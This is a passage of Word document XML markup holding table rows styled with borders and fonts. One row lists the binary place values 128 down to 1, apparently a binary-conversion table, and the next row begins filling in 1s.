        <w:trPr>
          <w:trHeight w:val="238"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidTr="00386EB9">
        <w:trPr>
          <w:trHeight w:val="225"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
